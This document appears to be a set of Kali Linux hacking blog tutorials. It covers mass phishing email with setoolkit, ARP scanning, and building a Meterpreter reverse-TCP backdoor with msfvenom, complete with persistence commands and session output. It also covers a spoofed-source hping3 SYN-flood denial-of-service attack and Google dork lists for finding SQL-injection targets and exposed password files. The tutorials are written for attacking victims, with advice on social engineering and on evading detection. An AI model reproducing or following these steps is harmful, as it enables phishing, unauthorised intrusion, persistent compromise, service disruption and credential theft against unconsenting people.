Email Spamming / Mass Mailing on Kali Linux

What is Email Spamming

Mass Mailing method of sending same e-mail message to large number of people at the same time.

Mass Mailing concept is used for Phishing attacks,Spamming and promoting business online.

Before we begin Mass Mailing Attack first thing we need to do is create an email list.Check this tutorial to steal email addresses. it searches for e-mail addresses and collects them and places into a text file. Once your email list is ready we are good to go lets start:

Tool we are going to use is Setoolkit. Setoolkit is pre-installed in Kali so lets do it.

Once your List is ready we are good to go now.Open your terminal and type:

root@seven:~# setoolkit

When you use Setoolkit for the first time you will be asked to accept terms and conditions just type y and hit enter.

From the menu select 1 Social Engineering attacks.

From the next menu select 5 Mass mailer attack.

Now choose E-Mail Attack Mass Mailer and press enetr.

Now We need to give path to our file.In my case i have placed my file in the desktop so my path looks like this: /root/Desktop/seven.txt and press enter.

Select option 1 Use a gmail Account for your email attack.and press enter.

Now enter the email address you are going to use i am using anon24644@gmail.com and hit enter.

Enter the username that you want recipient to see and press enter.

Enter your gmail password Password field is not visible so type your password carefully.

You have to specify whether or not you want flag your email flag as high priority or not just no and press enter.

Enter your email subject and press enter.

set:phishing > Email subject: Enter your subject

Now you will be asked to send message as a plain or html select p and press enter.

Now Enter the body of your message when you are finished with your message type END in uppercase like this END and hit enter.

If you have followed correctly then all the emails from your list will be sent to your targets.
Do share if it helped you.

Scan Live hosts using Netdiscover in Kali Linux

Netdiscover is a simple tool to use.It uses (ARP)Address Resolution Protocol to find live hosts.Netdiscover discovers live hosts on a network but you must be connected to that network.

Netdiscover not only finds the live hosts also returns mac addresses and hostname.

netdiscover is an active/passive arp reconnaissance tool, initially developed to gain information about wireless networks without dhcp servers in wardriving scenarios. It can also be used on switched net‐ works. Built on top of libnet and libpcap, it can passively detect online hosts or search for them by sending arp requests.

Start Netdiscover

With the below command you can see all the options that we can use with netdiscover.

root@seven:~# netdiscover -h
Netdiscover 0.3-pre-beta7 [Active/passive arp reconnaissance tool]
  -i device: your network device
  -r range: scan a given range instead of auto scan. 192.168.6.0/24
  -l file: scan the list of ranges contained into the given file
  -p passive mode: do not send anything, only sniff
  -m file: scan the list of known MACs and host names
  -F filter: Customize pcap filter expression (default: "arp")
  -s time: time to sleep between each arp request (miliseconds)
  -n node: last ip octet used for scanning (from 2 to 253)
  -c count: number of times to send each arp requests 
  -f enable fastmode scan, saves a lot of time, recommended for auto
  -d ignore home config files for autoscan and fast mode

Autoscan

As soon as you start netdiscover it starts sending arp requests over network and prints out the result if it finds any live host. You can specify range too.

root@seven:~# netdiscover 
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.150.1   00:50:56:c0:00:08      1      60  VMware, Inc.                
 192.168.150.2   00:50:56:ec:30:74      1      60  VMware, Inc.                
 192.168.150.254 00:50:56:e2:92:e5      1      60  VMware, Inc.

Scan with range

In order to scan a specific range you must give -r option to netdiscover.Below command will scan for all the live hosts on a network. It scans for all the ip addresses(254) and only prints live hosts on screen.

root@seven:~# netdiscover -r 192.168.1.0/24

A quick scan

When you do autoscan it is always good idea to give -f option to it.It saves time.

root@seven:~# netdiscover -f

How to create persistent backdoor using metasploit in kali Linux

What is backdoor

Before starting i would like to give a brief overview of backdoor. Backdoor is a program which is used to control and monitor victim's computer remotely without being detected. Backdoor is a malicious program that enables hackers to access systems.They can modify files,copy and steal personal information.Backdoor is also known as trap door or trojan horse as wel.

Backdoors are sent to the victims systems either by someone or binded with another program.

In simple words when we

So now that we know what backdoor is lets start.

The tool We are going to use use msfvenom to create payload.So open your terminal and type the following command:

root@seven:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.130 LPORT=4444 -f exe >backdoor.exe

Replace LHOST with your ipaddress.

On successful completion a file with backdoor.exe will be created and saved in your home directory..Now open Metasploit.Now we are done with msfvenom.So open your metasploit because this is where we will be doing real work like viewing sessions etc.

Type the following command in terminal:

root@seven:~# msfconsole

Now we need to use handler exploit so type type:

msf > use exploit/multi/handler

Now set payload to windows meterpreter reverser tcp type:

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

Set your LHOST(Your IP address)Replace ipaddress with yours.

msf exploit(handler) > set LHOST 192.168.150.130 
LHOST => 192.168.150.130

Set your LPORT

msf exploit(handler) > set LPORT 4444
LPORT => 4444

Now we are all set type exploit. When you type the below command exploit will start and will run in the backround.Once your stage is set we are ready to go further.

Now find a way to send payload that we generated to victim's machine. Use your social engineering skills.When victim clicks we can exploit them.There are couple of ways to send backdoor to victim's machine use your social engineering skills or bind with some other application.

Now below command withh run the exploit and sends it in background.

msf exploit(handler) > exploit -i - j

Now type help command go see the options you can use with victim's machines.As you can see there are plenty of options you can use.

meterpreter > help

Now type the sysinfo to see the victim's system information.

meterpreter > syinfo
[-] Unknown command: syinfo.
meterpreter > sysinfo
Computer        : DARKNIGTHT
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

As you can see i ran backdoor in my win8 machine to test.And i am getting information remotely.

Now we need to make it persistence. So whenever our victim login we will have our session created. just type the below command to get persistance help menu.You have many options here it's upto you to use them.

  meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L   Location in target host to write payload to, if none %TEMP% will be used.
    -P   Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T   Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i   The interval in seconds between each connection attempt
    -p   The port on which the system running Metasploit is listening
    -r   The IP of the system running Metasploit listening for the connect back

Now we need to use -U option to create persistence backdoor. Below command will write script into autorun so whenever your victim logs in a session will be created.

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.150.130 
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DARKNIGTHT_20161027.3914/DARKNIGTHT_20161027.3914.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.150.130 LPORT=4444
[*] Persistent agent script is 148428 bytes long
[+] Persistent Script written to C:\Users\ZEEROS~1\AppData\Local\Temp\uXwdPFQQc.vbs
[*] Executing script C:\Users\ZEEROS~1\AppData\Local\Temp\uXwdPFQQc.vbs
[+] Agent executed with PID 3440
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sYidKTQoKVgpjRD
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sYidKTQoKVgpjRD
meterpreter >

-r You need to give ip address of your machine. 
-i The interval in seconds between each connection attempt

That's it for this tutorial .That was a basic way to create a backdoor. I am definately writing more tutorials on backdoors.Please do share if it helps you.

How to use hping3 in kali Linux(Performing dos attack)

What is hping3

hping3 is a network tool able to send custom TCP/IP packets and to dis‐ play target replies like ping program does with ICMP replies. hping3 handle fragmentation, arbitrary packets body and size and can be used in order to transfer files encapsulated under supported protocols.

Hping3 is extremely powerful you can do following things with hping3

• Test firewall rules
• Advanced port scanning
• Test net performance using different protocols, packet size, TOS (type of service) and fragmentation.
• Path MTU discovery
• Transferring files between even really fascist firewall rules.
• Traceroute-like under different protocols.
• Firewalk-like usage.

What is dos Attack

Dos stands for denial of service. Dos attack shuts down Webservers/systems and completely makes them inaccessible to users.

Dos attack floods target network with excess with excess requests dos slows down the speed and eventually force webservers and systems to shut down.

Before performing dos you will need the ip address of your victim and remember victim should be connected to the same network as you.You can use Netdiscover tool to find ip address of the victim.

Hoing3 is really easy to use so fire up your terminal and type the following command:

root@seven:~# hping3 -S --flood -V 192.168.43.2

-S Sets SYN tcp flag.Which mean you are sending syn packets.
--flood Sends lots of packets and ignore the response.it sends packets as fast as possible.

After few minutes when hping3 floods system with lots of packets he will be forced to quit network.

We are not done here in this way there are chances of getting caught.So we need to randomize our ip address to protect our identity.

So type the following command:

root@seven:~# hping3 -S -U --flood --rand-source -V 192.168.150.140 

--rand-source Randomize the ip address.

That was simple and and straight .Please do share if it helped you.

Google dorking hacking techniques

What is Goolge Dorking ?

Google dorking is an advanced technique to retrieve or obtain information from google.Google dorking is mostly used to find vulnerable targets and sensitive data using advance search queries.

In other words google dorking is an art of making google search efficient and simpler.

Basic google dorking techniques:

Just like programming languages google also uses search operators.There are plenty of search operators to refine google search.Some commonly used are:

1 . intitle     returns the pages that contain the strings you specify example:
intitle:python tutorial   it will return the pages which have python tutorial in the title text.

2 . allintitle:admin login   it returns the pages whose title have both admin and login in the tilte.

3 . inurl:adminlogin.php     It returns the pages which have adminlogin.php in their url. You can use similar term to find asp pages inurl:adminlogin.asp. 
inurl:login    

4 . related:www.tutorialpoint.com    It will return similar website to tutorialpoint.

5 . cache:www.tutorialpoint.com    It returns cached pages even when website is down or internet not workin.

6 . ext:ppt python   it will return ppt files on python.

7 .  site:www.python.com   it returns the links within the python.com

8 . 

book:python language   it will search for python books inside google online library. 

Dorks for Finding Vulnerable for SQL injection

1. inurl:newsDetail.php?id=
2. inurl:news.php?id=
3. inurl:avd_start.php?avd=
4. inurl:event.php?id=
5. inurl:product-item.php?id=
6. inurl:aboutbook.php?id=
7. inurl:show.php?id=
8. inurl:newsitem.php?num=
9. inurl:play_old.php?id=
10. inurl:games.php?id=
11. inurl:page.php?file=
12. inurl:newsDetail.php?id=
13. inurl:gallery.php?id=
14. inurl:article.php?id=
15. inurl:view_product.php?id=
16. inurl:sw_comment.php?id=
17. inurl:sql.php?id=
18. inurl:avd_start.php?avd=
19. inurl:news.php?id=
20. inurl:kategorie.php4?id=
21. inurl:faq2.php?id=
22. inurl:opinions.php?id=
23. inurl:pages.php?id=
24. inurl:participant.php?id=
25. inurl:participant.php?id=
26. inurl:chappies.php?id=
27. inurl:prod_detail.php?id=
28. inurl:productinfo.php?id=
29. inurl:review.php?id=
30. inurl:page.php?id=
31. inurl:newsid=
32. inurl:news_display.php?getid=
33. inurl:news-full.php?id=
34. inurl:newsid=
35. inurl:item_id=
36. inurl:shredder-categories.php?id=
37. inurl:main.php?id=
38. inurl:download.php?id=
39. inurl:avd_start.php?avd=
40. intitle:Login * Webmailer
41. inurl:staff_id=
42. inurl:staff_id=
43. inurl:show.php?id=
44. inurl:newsDetail.php?id=
45. inurl:newsitem.php?num=
46. inurl:pageid=
47. inurl:article.php?ID=
48. intitle:ANNOUNCE -inurl:lists
49. inurl:curriculum.php?id=
50. inurl:tekst.php?idt
51. nurl:newsticker_info.php?idn=

Advance Google Dorking techniques

Dork for finding password lists

inurl:wp-content/uploads filetype:xls | filetype:xlsx password

filetype:log intext:password | pass | pw

inurl:"ftp" intext:"user" | "username" | "userID" | "user ID" | "logon" | "login" intext:"password" | "passcode" filetype:xls | filetype:xlsx

intext:smtp | pop3 intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx

ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD

inurl:etc -intext:etc ext:passwd

Dork for finding usernames

site:extremetracking.com inurl:"login="

intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"

inurl:root.asp?acs=anon

filetype:conf inurl:proftpd.conf -sample